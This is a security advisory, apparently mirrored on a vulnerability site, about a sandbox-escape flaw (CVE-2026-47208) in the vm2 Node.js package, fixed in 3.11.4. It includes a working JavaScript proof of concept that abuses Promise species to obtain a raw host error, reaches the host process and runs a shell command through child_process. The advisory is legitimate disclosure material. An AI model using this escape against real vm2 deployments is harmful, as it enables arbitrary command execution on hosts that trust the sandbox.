返回列表

vm2 is Vulnerable to Sandbox Breakout Through Promise Species

CVE-2026-47208RCE2026-05-29

漏洞描述

### Summary VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. ### Details The `localPromise` constructor was changed to call `this.then(undefined, eater)` to ensure a rejected promise is always used. However, this is missing a call to `resetPromiseSpecies` to ensure that `this` has no special species. Since the species can be changed a custom promise can be used to supply a custom reject method to the executor allowing to get a raw host error and escape the sandbox. ### PoC ```js const {VM} = require("vm2"); const vm = new VM(); vm.run(` class E extends Error {} function so(d) { if (d > 0) so(d-1); const e = new E(); e.stack; throw e; } let ex, ct; class FakePromise extends Promise { static get [Symbol.species](){return ct;} } function doCatch(f) { ex=undefined; const p=Promise.withResolvers(); ct = function(e){e(f, v=>{ex=v;p.resolve();})}; new FakePromise(r=>r()); return p.promise; } (async function f(s) { let min = s; let max = 100000; while (min<max) { const mid = (min+max)>>1; await doCatch(()=>so(mid)); if (ex.name==="RangeError" && !(ex instanceof RangeError)) { ex.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned'); return; } if (ex instanceof E) { min = mid+1; } else { max = mid; } } f(s+1); })(0); `); ``` ### Impact Attackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox. Source Code Location: https://github.com/patriksimek/vm2 Affected Packages: - npm:vm2, affected <= 3.11.3, patched in 3.11.4 CWEs: - CWE-913: Improper Control of Dynamically-Managed Code Resources CVSS: - Primary: score 10.0, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - CVSS_V3: score 10.0, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H References: - https://github.com/patriksimek/vm2/security/advisories/GHSA-76w7-j9cq-rx2j - https://github.com/patriksimek/vm2/commit/a462655009669c3124ee39498121651597529ea8 - https://github.com/patriksimek/vm2/releases/tag/v3.11.4 - https://github.com/advisories/GHSA-76w7-j9cq-rx2j

查看原文